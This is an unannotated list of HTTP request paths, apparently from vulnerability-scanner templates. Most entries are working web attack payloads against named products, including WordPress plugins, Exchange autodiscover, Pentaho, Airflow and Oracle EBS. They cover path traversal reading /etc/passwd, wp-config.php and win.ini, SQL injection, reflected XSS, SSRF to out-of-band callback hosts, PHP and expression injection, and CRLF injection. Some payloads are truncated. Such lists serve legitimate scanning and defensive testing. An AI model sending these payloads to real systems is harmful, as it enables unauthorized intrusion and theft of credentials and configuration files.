/api/users/search_authors
/wp-content/plugins/simple-file-list/includes/ee-downloader.php?eeFile=%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e/wp-config.php
/wp-content/plugins/video-synchro-pdf/reglages/Menu_Plugins/tout.php?p=tout
/OA_HTML/ibeCAcpSSOReg.jsp
/OA_HTML/ibeCRgpPrimaryCreate.jsp
/OA_HTML/ibeCRgpIndividualUser.jsp
/OA_HTML/ibeCRgpPartnerPriCreate.jsp
/users/sign_in
/index.php/Pan/ShareUrl/downloadSharedFile?true_path=../../../../../../windows/win.ini&file_name=win.ini
/AccessAnywhere/%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255c%252e%252e%255cwindows%255cwin.ini
/api/get-organizations?p=123&pageSize=123&value=cfx&sortField=&sortOrder=&field=updatexml(1,version(),1)
/idp/profile/oidc/authorize?client_id=demo_rp&request_uri=https://{{interactsh-url}}
/admin/airflow/code?root=&dag_id=example_passing_params_via_test_command
/code?dag_id=example_passing_params_via_test_command
/cors_proxy/https://oast.me/
/api/change_setting?second_value=no_reload&disable_sequence=true&value=../../../../../../../etc/passwd
/module/api.php?mobile/webNasIPS
/download/C%3a%2fwindows%2fsystem.ini
/wp/wp-content/uploads/wpjobboard/
/wp-content/uploads/wpjobboard/
/index.php?s=example
/wp-content/backups-dup-lite/dup-installer/main.installer.php?is_daws=1
/wp-content/dup-installer/main.installer.php?is_daws=1
/secure/Signup!default.jspa
/wp-content/plugins/simple-ajax-chat/sac-export.csv
/cmscp/ext/collect/fetch_url.do?url=https://oast.live
/category_view.php
/folder_view.php
/downloader.php?file=../../../../../../../../../../../../../etc/passwd%00.jpg
/Solar_SlideSub.php?id=4&play=1&pow=sds%22%3E%3Cscript%3Ealert(document.domain)%3C/script%3E%3C%22&bgcolor=green
/modules/blockwishlist/config.xml
/resources//../WEB-INF/web.xml
/test.txt
/wp-admin/admin-post.php?page=pb_backupbuddy_destinations&local-destination-id=/etc/passwd&local-download=/etc/passwd
/live_mfg.shtml
/cgi-bin/ExportAllSettings.sh
/admin/?page=reports&date=2022-05-27%27%20union%20select%201,2,3,md5(
/admin/?page=user/manage_user&id=-6%27%20union%20select%201,md5(
/admin/?page=teams/manage_team&id=1
/admin/?page=teams/view_team&id=1
/admin/?page=requests/view_request&id=1
/admin/?page=requests/manage_request&id=1
/admin/requests/take_action.php?id=6
/index.php?q=category&search=Banking%27%20union%20select%201,2,3,4,5,6,7,8,9,10,11,12,13,md5({{num}}),15,16,17,18,19--+
/index.php?q=hiring&search=URC%27%20union%20select%201,2,3,4,5,6,7,8,9,md5({{num}}),11,12,13,14,15,16,17,18,19--+
/doAs?=`{{url_encode(
/wp-admin/admin-ajax.php?action=admin_init&log_filename=../../../../../../../../../../../../../etc/passwd
/git/notifyCommit?url={{randstr}}&branches={{randstr}}
/../../../../../../../../etc/passwd
/components/statestore
/overview
/controlplane
/autodiscover/autodiscover.json/v1.0/aa@{{Host}}?Protocol=Autodiscoverv1
/autodiscover/autodiscover.json/v1.0/aa..{{Host}}/owa/?&Email=autodiscover/autodiscover.json?a..{{Host}}&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@{{Host}}/owa/?&Email=autodiscover/autodiscover.json?a@{{Host}}&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json?aa..{{Host}}/owa/?&Email=autodiscover/autodiscover.json?a..{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell
/autodiscover/autodiscover.json?aa@{{Host}}/owa/?&Email=autodiscover/autodiscover.json?a@{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell
/autodiscover/autodiscover.json?aa..{{Host}}/owa/?&Email=aa@autodiscover/autodiscover.json?a..{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell
/autodiscover/autodiscover.json?aa@{{Host}}/owa/?&Email=aa@autodiscover/autodiscover.json?a@{{Host}}&Protocol=Autodiscoverv1&{{Host}}Protocol=Powershell
/autodiscover/autodiscover.json/v1.0/aa@autodiscover/autodiscover.json?a..@{{Host}}&Protocol=Autodiscoverv1&Protocol=Powershell
/autodiscover/autodiscover.json?@{{Host}}/&Email=autodiscover/autodiscover.json%3f@{{Host}}
/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/etc/passwd
/wp-content/plugins/usc-e-shop/functions/content-log.php?logfile=/Windows/win.ini
/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://{{interactsh-url}}/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4
/getCorsFile?urlPath={{base64(
/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js?url=%23{T(java.net.InetAddress).getByName(
/api/v2.0/search?q=/
/ExportReportingManager.aspx
/cgi-bin/ExportLogs.sh
/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://interact.sh
/wp-admin/admin-ajax.php?action=kc_get_thumbn&id=https://example.com
/?p=1&xsg-provider=data://text/html,%3C?php%20phpinfo();%20//&xsg-format=yyy&xsg-type=zz&xsg-page=pp
/?p=1&xsg-provider=%3Cimg%20src%20onerror=alert(document.domain)%3E&xsg-format=yyy&xsg-type=zz&xsg-page=pp
/wp-admin/admin-ajax.php?action=formcraft3_get&URL=https://{{interactsh-url}}
/wp-json/wp/v2/asked-question
/cors_proxy/https://www.interact.sh
/interlib/report/ShowImage?localPath=etc/passwd
/interlib/report/ShowImage?localPath=C%3a%2fwindows%2fsystem.ini
/..\..\..\..\..\..\..\..\..\..\windows\win.ini
/?PagePrincipale/rss&id=1%27%3Cscript%3Ealert(document.domain)%3C/script%3E
/live_mfg.html
/api/logout?redirect_to=%0d%0aSet-Cookie:crlfinjection=1;
/lib/icinga/icinga-php-thirdparty/etc/passwd
/icinga2/lib/icinga/icinga-php-thirdparty/etc/passwd
/icinga-web/lib/icinga/icinga-php-thirdparty/etc/passwd
/config/list
/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/etc/passwd
/front//%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c..%5c/windows/win.ini
/wp-content/plugins/elementor/assets/js/frontend.min.js
/cms/admin/group/all
/?doAs=`{{url_encode(
/api/moduleInformation
/jsps/helprequest.jsp?url=%27)%22+onerror=%22confirm(%27document.domain%27)%22
/perfsonar-graphs/cgi-bin/graphData.cgi?action=ma_data&url=http://oast.fun/esmond/perfsonar/archive/../../../&src=8.8.8.8&dest=8.8.4.4
/../../../../../../../../../../../../windows/iis.log
/wp-json/download-monitor/v1/user_data
/solr/solrdefault/debug/dump?param=ContentStreams&stream.url=file://{{path}}
/royal_event/btndates_report.php#?=
/index.php?rest_route=/whm/v3/themesettings
/index/download/index?name=index.php&url=../../application/database.php
/card_scan.php?No=0000&ReaderNo=0000&CardFormatNo=%3Cimg%20src%3Dx%20onerror%3Dalert%28document.domain%29%3E
/proxy?url=http://{{interactsh-url}}
/api/v2.0/users/current
/mims/updatecustomer.php?customer_number=-1%27%20and%206%3d3%20or%201%3d1%2b(SELECT%201%20and%20ROW(1%2c1)%3e(SELECT%20COUNT(*)%2cCONCAT(CHAR(95)%2cCHAR(33)%2cCHAR(64)%2cCHAR(52)%2cCHAR(100)%2cCHAR(105)%2cCHAR(108)%2cCHAR(101)%2cCHAR(109)%2cCHAR(109)%2cCHAR(97)%2c0x3a%2cFLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.COLLATIONS%20GROUP%20BY%20x)a)%2b%27
/College-Management-System/admin/asign-single-student-subjects.php
/usr-cgi/logdownload.cgi?file=../../../../../../../../etc/passwd
/pentaho/Login
/pentaho/api/ldap/config/ldapTreeNodeChildren/require.js
/js/zimbraMail/share/model/ZmSettings.js
/
